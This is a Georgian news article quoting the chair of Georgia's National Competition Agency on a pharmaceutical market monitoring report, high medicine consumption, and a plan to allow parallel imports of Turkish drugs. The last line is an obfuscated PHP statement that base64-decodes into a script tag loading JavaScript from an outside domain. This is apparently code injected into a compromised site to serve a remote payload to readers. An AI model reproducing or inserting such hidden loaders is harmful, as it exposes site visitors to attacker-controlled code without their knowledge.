celsiusi
ავერსი შნაიდერი
საქართველოს კონკურენციის ეროვნული სააგენტოს თავმჯდომარის, ირაკლი ლექვინაძის განცხადებით, მისი უწყების მიერ განხორციელებული მონიტორინგის შედეგად გამოიკვეთა, რომ საქართველოში ერთ სულ მოსახლეზე მედიკამენტის მოხმარება საკმაოდ მაღალია და ამას თავისი მიზეზები აქვს.
 
როგორც ლექვინაძემ მედიაჰოლდინგ „კვირის“ პრესკლუბში გამართულ პრესკონფერენციაზე განაცხადა, პირველი მიზეზია ის, რომ ექიმების მიერ დანიშნულების გამოწერისას მითითება ძვირადღირებულ მედიკამენტებზე ხდება, ხოლო მეორე მიზეზი მედიკამენტების ჭარბი მოხმარებაა.
 
ამასთან, ლექვინაძის განმარტებით, არის შემთხვევები, როდესაც ერთი დანიშნულების სხვადასხვა სახის ანტიბიოტიკი ინიშნება.
 
კონკურენციის სააგენტოს ხელმძღვანელმა ისაუბრა მთავრობის ინიციატივაზე თურქეთის ბაზრის გახსნასთან დაკავშირებით და აღნიშნა, რომ ხელმისაწვდომობა იაფფასიან, მაგრამ ხარისხიან მედიკამენტებზე უზრუნველყოფს უფრო მეტ კონკურენციას, უფრო მეტი კონკურენცია კი უზრუნველყოფს უკეთეს შეთავაზებებს მოქალაქეებისთვის.
 
"გუშინ, საქართველოს პრემიერ-მინისტრმა მთავრობის სხდომაზე გააჟღერა ორი მნიშვნელოვანი ინიციატივა, რომელიც ეხმიანებოდა პროცესს, რომელიც გულისხმობს საქართველოში ფარმაცევტული ბაზრის გაჯანსაღებას, მეტი კონკურენტუნარიანობის მიღწევას და მისი მიზანია მოქალაქეებისთვის მედიკამენტებზე დანახარჯების შემცირება. კონკურენციის სააგენტომ მოამზადა ფარმაცევტული ბაზრის მონიტორინგის ანგარიში და დავალება იქნა გაცემული, სადაც ჯანდაცვის სამინისტროს მხრიდან უნდა შეიქმნას სამუშაო ჯგუფი, რომელიც ფარგლებში მომზადდება რეგულაციების პაკეტი. თუ რა უნდა იყოს ეს რეგულაციები, აღწერილია ჩვენი მონიტორინგის ანგარიშში. ფარმაცევტული ბაზრის მონიტორინგის ფარგლებში გაცემულია 13 რეკომენდაცია, რაც ჩვენი ხედვით, მიგვაჩნია, რომ ამ ნაბიჯების გადადგმის შემდეგ მოხდება ფარმაცევტული ბაზრის კონკურენტუნარიანობის ზრდა, უფრო მეტი გამჭვირვალობის უზრუნველყოფა და მოქალაქეების მხრიდან მედიკამენტებზე დანახარჯების შემცირება. მეორე მნიშვნელოვანი ინიციატივა არ იყო დაკავშირებული ჩვენი მონიტორინგის ანგარიშთან, მაგრამ ეს არის ასევე პოლიტიკის მნიშვნელოვანი ნაწილი და ის გულისხმობდა თურქული ბაზრიდან აღიარების რეჟიმის შემოტანას, რომლის მიხედვითაც დაშვებული ხდება პარალელური იმპორტი. თურქული ინდუსტრია გამოირჩევა ბაზარზე არსებული ხელმისაწვდომი ფასებით და ძალიან ბევრ შემთხვევაში ადამიანები თურქეთში მოიძიებენ მედიკამენტებს. საკმაოდ მნიშვნელოვანი ფასთა შორის სხვაობებია. გუშინ კომპანიების მხრიდანაც გაკეთდა საკმაოდ კარგი განცხადებები, რომ ისინი დაამუშავებენ იმპორტის მიმართულებებს და ძალიან მალე შედარებით იაფიანი, მაგრამ ხარისხიანი მედიკამენტები ქართულ ბაზარზეც იქნება ხელმისაწვდომი. კონკურენციის სააგენტო თურქეთის ბაზრის გახსნას, ძალიან მნიშვნელოვნად ვაფასებთ იმიტომ, რომ ხელმისაწვდომობა იაფფასიან, მაგრამ ხარისხიან მედიკამენტებზე უზრუნველყოფს უფრო მეტ კონკურენციას, უფრო მეტი კონკურენცია კი უზრუნველყოფს უკეთეს შეთავაზებებს მოქალაქეებისთვის. ასევე მკაფიოდ დაფიქსირდა, რომ GMP სტანდარტი იქნება შეფასების ინსტრუმენტი, რომელიც მთავარი იქნება თურქეთიდან მედიკამენტების იმპორტის ნაწილში. ეს ძალიან მნიშვნელოვანია, რადგან იაფიანი მედიკამენტი საქართველოში არ უნდა ნიშნავდეს უხარისხო მედიკამენტს“, - განაცხადა ლექვინაძემ.
 
მისივე ინფორმაციით, ფარმაცევტული ბაზრის მონიტორინგი კონკურენციის სააგენტომ 2019 წელს დაიწყო და 2016-2020 წლის პერიოდი შეაფასეს.
 
როგორც ლექვინაძემ განმარტა, შეფასდა ბაზარზე არსებული ფარმაცევტული კომპანიების მდგომარეობა და მათი პოზიციონირება როგორც ექსპორტის, ასევე საცალო გაყიდვების ნაწილში.
 
„შევარჩიეთ 6 ყველაზე გაყიდვადი მედიკამენტი სპეციალისტებთან ერთად, რომელიც საქართველოში გამოიყენება ყველაზე მეტად. ასევე, შევაფასეთ კანონმდებლობა, რამდენად არის ის თანხვედრაში კონკურენციის პრინციპებთან. რამდენიმე მნიშვნელოვან დასკვნამდე მივედით - ერთ სულ მოსახლეზე მედიკამენტის მოხმარება საკმაოდ მაღალია და ამას თავისი მიზეზები აქვს. პირველი- დანიშნულების გამოწერისას მითითება ხდება ძვირადღირებულ მედიკამენტებზე, რაც აძვირებს მედიკამენტების მოხმარებას და მეორე - ხდება მედიკამენტების ჭარბი მოხმარებაც. არის შემთხვევები, როდესაც ერთი დანიშნულების სხვადასხვა სახის ანტიბიოტიკი ინიშნება და ამ კვლევის პროცესში მაგალითებიც გვქონდა. ციფრებს რომ შევხედოთ ბოლო 4 წელიწადში, საქართველოში მედიკამენტების 90%-ის იმპორტირება ხდება, ხოლო ადგილობრივი წარმოება 9-10%-ის ფარგლებშია, თუმცა, ნედლეული იქაც იმპორტირებულია. ბოლო 4 წელიწადში იმპორტის ღირებულება საქართველოში გაზრდილია ლარში 40%-ით, ხოლო დოლარში დაახლოებით 7%-ით. 33%-იანი სხვაობა გამოწვეულია კურსთაშორის სხვაობით და სხვადასხვა ლოჯისტიკური ხარჯებით. თუმცა, დოლარშიც რომ შევხედოთ, მედიკამენტების იმპორტი გაზრდილია, რაც იმას ნიშნავს, რომ ამ პერიოდში მედიკამენტების მოხმარება საქართველოში მზარდი იყო“, - განაცხადა ლექვინაძემ.
898
echo base64_decode("PHNjcmlwdCBzcmM9Ii8vYWsuZGtlLm1lLyI+PC9zY3JpcHQ+");